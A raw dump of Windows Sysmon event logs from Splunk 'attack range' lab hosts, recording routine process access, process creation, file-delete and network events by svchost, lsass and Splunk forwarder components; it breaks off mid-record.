C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.770{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.770{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0DD6-6216-9804-000000003802}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.770{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DD6-6216-9804-000000003802}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.771{C8EA50B7-0DD6-6216-9804-000000003802}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.707{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC2AB16EF4A6918E189CB3C845FEAD06,SHA256=CF7599CA2094849802A1E25B5D8C60B76C531CD453159FBC0A6DE1EAAB5517C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:02.370{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F485C8B37EFF94A8449B971B63E12C3A,SHA256=09597249AB7EBADEBC81EBC5223B6D664784C0F82A575B077144C937F6DCE402,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.301{C8EA50B7-0DD6-6216-9704-000000003802}60243624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.129{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DD6-6216-9704-000000003802}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.129{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.129{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.129{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.129{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.129{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0DD6-6216-9704-000000003802}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.129{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DD6-6216-9704-000000003802}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.130{C8EA50B7-0DD6-6216-9704-000000003802}6024C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000284834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:01.545{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53205-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:03.707{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26F46D4E910016374F480F3DD7C2AB2F,SHA256=3AD8BCB63FD4FE8B907027776921E89125774FC4DA1EBE24D7C2D4081AB284EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:01.479{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51154-false10.0.1.12-8000- 23542300x8000000000000000213939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:03.385{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EB1AAFB8CDBE8F2A56366A0D0A7FCA9,SHA256=40B8062B119542751333C16DB35B519EC88CE81A2AA30C31FBDB287DFC91D3DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:03.145{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F87CBAF3BE1A348DE1BBE5DCBB7F1A23,SHA256=539670B5EFD775EFBAC00FE5A8618C4DB3B1C2C28129B22C657A002C55C19137,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:03.145{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A01A148D27AE4DE31654335EF918DE9,SHA256=E68564EEB3FFDD54F9F303F24A1BD44950F7D253A03BD447D982A635962378D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:03.060{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53206-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:03.060{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53206-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000284844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:04.738{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9ECDA962E395BE48C2AAE72CE986733,SHA256=B12393D1E31ECBE81BA20E8C538A71895CD2AEAAF4970A00D4BA9A57C8F58572,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:04.432{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51C342C89990D7312F0EDDC293025643,SHA256=57658F519B524D004780F7C0B482616E19D51A0D33CFD8624D48CE7A8BA43ECE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:04.582{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F87CBAF3BE1A348DE1BBE5DCBB7F1A23,SHA256=539670B5EFD775EFBAC00FE5A8618C4DB3B1C2C28129B22C657A002C55C19137,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:04.254{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DD8-6216-9904-000000003802}2352C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:04.254{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:04.254{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:04.254{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:04.254{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:04.254{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0DD8-6216-9904-000000003802}2352C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:04.254{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DD8-6216-9904-000000003802}2352C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:04.255{C8EA50B7-0DD8-6216-9904-000000003802}2352C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program 